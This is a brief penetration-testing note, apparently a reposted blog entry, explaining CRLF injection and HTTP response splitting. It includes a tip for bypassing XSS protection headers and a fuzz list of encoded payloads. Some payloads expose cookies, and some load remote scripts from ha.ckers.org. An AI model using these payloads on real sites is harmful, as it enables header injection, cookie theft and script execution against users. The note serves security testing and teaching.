了解CRLF

admin
admin
admin
139171
文章
114
评论
2024年12月24日13:34:14评论3 views字数 2367阅读7分53秒阅读模式

目录

  1. Simple note:
  2. Tips:
  3. Reference

Simple note:

CRLF: Carriage-Return Line-Feend.

Use CR, ASCII 13 \r (回车) , LF, ASCII 10, \n and %0d%0a to break the HTTP request.

In the penetration test, if we found a request is like this:

1
2
3
 
GET /test/demo.php?url=https://www.threezh1.com
That we can contral.
....

If the HTTP Header of the request return with the response, which means we can control the HTTP Header.(Of course include the Url.)

1
2
3
4
5
6
7
 
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: deflate
...
That we can contral.
...
Locations=https://www.threezh1.com

Then we can further test the request, change the parameter url to

%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<script>alert(1)</script>

Equivalent to the following

1
2
3
4
5
6
7
8
9
 
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length:%2047

<script>alert(1)</script>

or you can chose add a picture: <img src=1>

If the window pops up successfully, there is a CRLF.

Tips:

When the xss is intercepted, you can add X-XSS-Protection:0 to bypass.

And if you meet with a CRLF, there are some filters, you can fuzz the point with the disc of C1h2e1.

FUZZ:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
 
%0d%0a
%0d%0a%0d%0a
r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0a<html>Injected%02Content</html>
%0d%0d%0a%0a
0x0D0x0A
0x0D0x0D0x0A0x0A
\r\n
%5cr%5cn
%0%0d%0ad%0%0d%0aa
%0%0D%0AD%0%0D%0AA
%0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com
%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E
%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Reference

- By:threezh1.com

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月24日13:34:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   了解CRLFhttps://cn-sec.com/archives/3547524.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息